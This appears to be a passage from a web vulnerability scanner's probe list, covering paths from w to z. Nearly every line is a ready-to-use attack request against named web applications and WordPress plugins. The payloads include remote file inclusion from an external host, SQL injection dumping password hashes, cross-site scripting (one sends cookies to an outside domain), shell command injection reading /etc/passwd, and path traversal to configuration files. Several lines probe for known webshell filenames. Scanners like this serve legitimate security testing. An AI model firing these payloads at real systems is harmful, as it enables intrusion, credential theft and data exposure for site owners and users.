w-agora_path/moderate_notes.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/reorder_forums.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w.php
w3c/
wamp_dir/setup/yesno.phtml?no_url=http://www.yxlink.com/nvs_test.txt?
wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,md5(333333),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20information_schema.tables;%23
wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,1,0x27,0x4E56535F54455354,2,0x27,0x7e)%20from%20information_schema.tables%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
wapchat/src/eng.adCreate.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.adCreateSave.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.createRoom.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.forward.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.pageLogout.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.resultMember.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.saveNewRoom.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.searchMember.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.writeMsg.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
war.php?vwar_root=http://www.yxlink.com/nvs_test.txt
war.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
warez
warn.php?file=http://www.yxlink.com/nvs_test.txt
was40/passwd/passwd.htm
was40/tree
watermark.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
way-board.cgi?db=/etc/passwd%00
way-board/way-board.cgi?db=/etc/passwd%00
wbxml/WBXML/Decoder.php?base_dir=http://www.yxlink.com/nvs_test.txt
wbxml/WBXML/Encoder.php?base_dir=http://www.yxlink.com/nvs_test.txt
wcf/acp/dereferrer.php?url=javascript:alert(2222);
wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
wcm/services
web
web-console/
web-console/Invoker
web-console/status?full=true
web.config
web.config.bak
web.config.bakup
web.config.old
web.config.temp
web.config.tmp
web/
web/Administration/Includes/configureText.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/contentHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/deleteContent.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/deleteUser.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/userHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules//Module/Module.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/EditProfileModule/external.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MyNetworksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Flickrclient.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATHhttp://www.yxlink.com/nvs_test.txt?
web/help.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/includes/blogger.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/includes/functions/auto_email_notify.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/includes/functions/html_generate.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/includes/functions/validations.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/index.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/init_mysource.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt?
web/lib/xml/oai/ListRecords.php?xml_dir=http://www.yxlink.com/nvs_test.txt
web/login.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/logout.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/lom.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
web/msgList/viewmsg/actions/msgAnalyse.asp?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=\x22><script>alert(4444)</script>
web/network_module_selector.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/submit_abuse.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/submit_comment.php?path_prefix=http://www.yxlink.com/nvs_test.txt
webService/webServicesGeneral.jsf?');};alert(222);</script><!
webaccess
webadmin
webadmin.php
webadmin/
webalizer/
webamil/test.php
webamil/test.php?mode=phpinfo
webauthentication?GetPic?image=x%3Cimg%20src=%22A%22+onError=%22javascript:alert('Thanks%20for%20turning%20on%20the%20remotecontrol')%3b%22%3Exxx
webavis/class/class.php?root=http://www.yxlink.com/nvs_test.txt
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
webcalendar/week.php?user=\x5C\x22><script>alert(document.cookie)</script>
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>&email1=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>
webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>
webdav/index.html
webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=\x22><script>alert(333)</script>
webdist.cgi?distloc=;cat%20/etc/passwd
webessence/webessence/oembed.php?url=http://google.com&id=<script>alert(222);</script>
webgrind
weblogic
webmail/horde/test.php
webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.yxlink.com/nvs_test.txt
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yxlink.com/nvs_test.txt
webmediaexpl/htdocs/index.php?search=\x22onmouseover=alert(0)
webmin
webnews/template.php?content_page=http://www.yxlink.com/nvs_test.txt?
webplus.exe?about
webplus?about
webroot/css.php?CONFIGS=http://www.yxlink.com/nvs_test.txt
webshell.php
webstat/
webstats.html
webstats/
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
webtop/wdk/
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
webtop/wdk/samples/index.jsp
webyep-system/program/lib/WYURL.php?webyep_sIncludePath=http://www.yxlink.com/nvs_test.txt
webyep-system/programm/webyep.php?webyep_sIncludePath=http://www.yxlink.com/nvs_test.txt?
welcome.asp?id=%27
wexVFS4z
whatever.htr
whateverJUNK(4).html
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
wiki/style/default/admin/open.gif 
wikihome/action/conflict.php?TemplateDir=http://www.yxlink.com/nvs_test.txt
window.php?action=http://www.yxlink.com/nvs_test.txt
wizards
wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http://baidu.com'+document.cookie</script>
wmi.php
wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,101,108,108,111,32,58,68,32))</script>
wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.yxlink.com/nvs_test.txt?
work/index.php?g_include=http://www.yxlink.com/nvs_test.txt
work/module/forum/forum.php?g_include=http://www.yxlink.com/nvs_test.txt
worldpay_notify.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
wp
wp-admin
wp-app.log
wp-cache-phase1.php?plugin=http://www.yxlink.com/nvs_test.txt
wp-cli.yml
wp-content
wp-content/plugins/Calendar-Script/load-events.php?cid=1 union all select md5(333)
wp-content/plugins/akismet/readme.txt
wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
wp-content/plugins/civicrm/civicrm/packages/OpenFlashChart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/fv-wordpress-flowplayer/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
wp-content/plugins/hello.php
wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select  %201,2,3,4,5,6,7,8,md5(333),10,11,12,13,14,15,16,17 from wp_users--
wp-content/plugins/jetpack/_inc/genericons/genericons/example.html
wp-content/plugins/madebymilk/voting-popup.php?id=null'
wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/nextgen-gallery/xml/media-rss.php?mode=%3Cscript%3Ealert(1)%3C/script%3E
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,md5(333),6,7,8--
wp-content/plugins/plugin-dir/timeline/index.php?id=-1%20union%20select%20md5(333),md5(333),md5(333),md5(333),md5(333)
wp-content/plugins/slidedeck2-personal/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
wp-content/plugins/slidedeck2-pro/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
wp-content/plugins/taggedalbums/image.php?id='
wp-content/plugins/tagninja/fb_get_profile.php?id=<script>alert(333)</script>
wp-content/plugins/webplayer/config.php?id=\xE2\x80\x99 union all select 1,2,3,md5(333)
wp-content/plugins/woocommerce/assets/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/wp-click-track/open-flash-chart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
wp-content/plugins/wp-download.php?dl_id=null/**/union/**/all/**/select/**/md5(333)/*
wp-content/plugins/wp-syntaxhighlighter/syntaxhighlighter2/scripts//clipboard.swf?highlighterId=%22%29%29}catch%28e%29{}prompt%28document.domain%29;//
wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/wpeasystats/export.php?homep=http://www.yxlink.com/nvs_test.txt
wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,md5(333)%29,14,15,16,17,18,19,20+from+wp_users--
wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg%3E.jpg
wp-content/themes/flashnews/thumb.php?src=http://www.yxlink.com/nvs_test.txt
wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28md5(333),0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
wp-content/themes/magazine-basic/view_artist.php?id='
wp-content/themes/twentyfifteen/genericons/example.html
wp-includes
wp-includes/js/plupload//plupload.flash.swf?id=\x22));}catch(e){alert(1);}//
wp-includes/js/tiny_mce
wp-links-opml.php
wps/wcm/connect/'+or+'7SD7t'='7SD7t
wrsky.php
ws
ws/generic_api_call.pl?function=statns&amp;standalone=%3c/script%3e%3cscript%3ealert(1111)%3c/script%3e%3cscript%3e
wsk/wsk.php?wsk=http://www.yxlink.com/nvs_test.txt
wso_tmp.php
wstat/
wstats/wstats.jsp
wt.php
www
www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3Cscript%3Ealert%28111%29;%3C/script%3E
www/js/tiny_mce
www/js/tinymce
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
wwwstats.htm
wwwwais
wx/s.dll?d=/boot.ini
x.php
xEMAaUWU0nlNH9tQ
x_stat_admin.php?action=phpinfo
xarg_corner.php?xarg=http://www.yxlink.com/nvs_test.txt?
xarg_corner_bottom.php?xarg=http://www.yxlink.com/nvs_test.txt?
xarg_corner_top.php?xarg=http://www.yxlink.com/nvs_test.txt?
xdk/
xiao.php
xiaoma.php
xinfo.php
xitf4ish
xls
xm.php
xml
xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,md5(333),0x3a,pass,0x3a,0x0a)%20from%20users
xmlrpc
xmlrpc_server.php
xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt&2093085906=1&995617320=2
xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt?&2093085906=1&995617320=2
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
xt_counter.php?server_base_dir=http://www.yxlink.com/nvs_test.txt
xx.php
xxgk/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
y.php
yabbse/Sources/Packages.php?sourcedir=http://www.yxlink.com/nvs_test.txt
yacs/scripts/update_trailer.php?context[path_to_root]=http://www.yxlink.com/nvs_test.txt?
yijuhua.php
yjh.php
yp/job.php?action=list&station=1&genre=0%2527%20and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
yp/product.php?pagesize=${@print(md5(NVS_TEST))}
yrch/plugins/metasearch/plug.inc.php?path=http://www.yxlink.com/nvs_test.txt
ytb/cuenta/cuerpo.php?base_archivo=http://www.yxlink.com/nvs_test.txt
ytb/mensaje.php?m=<script>alert(/xss/)</script>
ytb/todos.php?id=-99+union+select+1,2,md5(333),contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
yyoa/ext/https/getSessionList.jsp?cmd=getAll
z
z.php
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
zabbix/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
zacosmall.php
zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
zecmd/zecmd.jsp
zehir.php
zeroclipboard
zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
zhidao/user.php?j=question&u=-1+union+select+1,2,3,md5(1234567890),5,6,7,8--
zip
zipfiles
zipndownload.php?PP_PATH=http://www.yxlink.com/nvs_test.txt?
zips
zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,88888888888-1,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,88888888888-1,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.yxlink.com/nvs_test.txt?
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zp-core/admin-uploadify/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
zp-core/zp-extensions/tiny_mce
zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
|~.aspx
~/<script>alert('Vulnerable')</script>.asp
~/<script>alert('Vulnerable')</script>.aspx
~nobody/etc/passwd